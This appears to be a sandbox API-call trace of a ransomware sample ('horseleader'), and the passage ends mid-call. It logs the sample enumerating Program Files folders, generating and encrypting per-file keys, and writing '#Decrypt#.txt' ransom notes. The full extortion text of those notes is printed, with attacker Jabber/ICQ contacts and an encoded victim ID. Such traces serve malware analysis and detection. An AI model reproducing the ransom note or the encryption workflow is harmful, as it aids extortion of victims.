FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0233.080] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="Windows") returned 1 [0233.080] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 89 [0233.080] StrStrIW (lpFirst="zh-changjei.xml", lpSrch=".horseleader") returned 0x0 [0233.080] lstrcmpW (lpString1="zh-changjei.xml", lpString2="#Decrypt#.txt") returned 1 [0233.080] lstrcmpW (lpString1="zh-changjei.xml", lpString2="_uninstalling_.png") returned 1 [0233.080] lstrlenW (lpString=".testttjffg") returned 11 [0233.080] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpSrch=".testttjffg") returned 0x0 [0233.080] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.080] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.081] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.103] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0233.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="Windows") returned 1 [0233.103] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 85 [0233.103] StrStrIW (lpFirst="zh-dayi.xml", lpSrch=".horseleader") returned 0x0 [0233.103] lstrcmpW (lpString1="zh-dayi.xml", lpString2="#Decrypt#.txt") returned 1 [0233.103] lstrcmpW (lpString1="zh-dayi.xml", lpString2="_uninstalling_.png") returned 1 [0233.103] lstrlenW (lpString=".testttjffg") returned 11 [0233.103] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpSrch=".testttjffg") returned 0x0 [0233.103] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.104] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.104] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.104] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0233.104] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="Windows") returned 1 [0233.104] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 89 [0233.104] StrStrIW (lpFirst="zh-phonetic.xml", lpSrch=".horseleader") returned 0x0 [0233.104] lstrcmpW (lpString1="zh-phonetic.xml", lpString2="#Decrypt#.txt") returned 1 [0233.104] lstrcmpW (lpString1="zh-phonetic.xml", lpString2="_uninstalling_.png") returned 1 [0233.104] lstrlenW (lpString=".testttjffg") returned 11 [0233.104] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpSrch=".testttjffg") returned 0x0 [0233.104] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.105] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.156] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 0 [0233.156] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.157] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\#Decrypt#.txt") returned 87 [0233.157] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.159] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.159] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.161] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.161] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.161] CloseHandle (hObject=0x1a4) returned 1 [0233.161] GetProcessHeap () returned 0x780000 [0233.161] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.161] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f513079, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f513079, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f513079, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x9655, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="main.xml", cAlternateFileName="")) returned 1 [0233.161] lstrcmpiW (lpString1="main.xml", lpString2="Windows") returned -1 [0233.161] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml") returned 77 [0233.162] StrStrIW (lpFirst="main.xml", lpSrch=".horseleader") returned 0x0 [0233.162] lstrcmpW (lpString1="main.xml", lpString2="#Decrypt#.txt") returned 1 [0233.162] lstrcmpW (lpString1="main.xml", lpString2="_uninstalling_.png") returned 1 [0233.162] lstrlenW (lpString=".testttjffg") returned 11 [0233.162] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpSrch=".testttjffg") returned 0x0 [0233.162] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.162] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0233.162] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.162] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="numbers", cAlternateFileName="")) returned 1 [0233.162] lstrcmpiW (lpString1="numbers", lpString2="Windows") returned -1 [0233.162] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers") returned 76 [0233.163] lstrcmpW (lpString1="numbers", lpString2=".") returned 1 [0233.163] lstrcmpW (lpString1="numbers", lpString2="..") returned 1 [0233.163] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.163] GetProcessHeap () returned 0x780000 [0233.163] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0233.163] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*") returned 78 [0233.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0233.164] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0233.164] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\.") returned 78 [0233.164] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0233.164] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0233.164] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0233.164] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\..") returned 79 [0233.164] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0233.164] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0233.164] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="numbase.xml", cAlternateFileName="")) returned 1 [0233.164] lstrcmpiW (lpString1="numbase.xml", lpString2="Windows") returned -1 [0233.164] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml") returned 88 [0233.164] StrStrIW (lpFirst="numbase.xml", lpSrch=".horseleader") returned 0x0 [0233.164] lstrcmpW (lpString1="numbase.xml", lpString2="#Decrypt#.txt") returned 1 [0233.164] lstrcmpW (lpString1="numbase.xml", lpString2="_uninstalling_.png") returned 1 [0233.165] lstrlenW (lpString=".testttjffg") returned 11 [0233.165] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml", lpSrch=".testttjffg") returned 0x0 [0233.165] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.165] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\numbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\numbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.165] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f7e6a73, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f7e6a73, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7e6a73, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x4c2, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="numbase.xml", cAlternateFileName="")) returned 0 [0233.165] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.165] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\#Decrypt#.txt") returned 90 [0233.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0233.166] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0233.166] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0233.171] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.171] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0233.171] CloseHandle (hObject=0x1a4) returned 1 [0233.171] GetProcessHeap () returned 0x780000 [0233.171] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0233.171] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="numbers.xml", cAlternateFileName="")) returned 1 [0233.171] lstrcmpiW (lpString1="numbers.xml", lpString2="Windows") returned -1 [0233.171] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml") returned 80 [0233.171] StrStrIW (lpFirst="numbers.xml", lpSrch=".horseleader") returned 0x0 [0233.172] lstrcmpW (lpString1="numbers.xml", lpString2="#Decrypt#.txt") returned 1 [0233.172] lstrcmpW (lpString1="numbers.xml", lpString2="_uninstalling_.png") returned 1 [0233.172] lstrlenW (lpString=".testttjffg") returned 11 [0233.172] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpSrch=".testttjffg") returned 0x0 [0233.172] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0233.172] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, 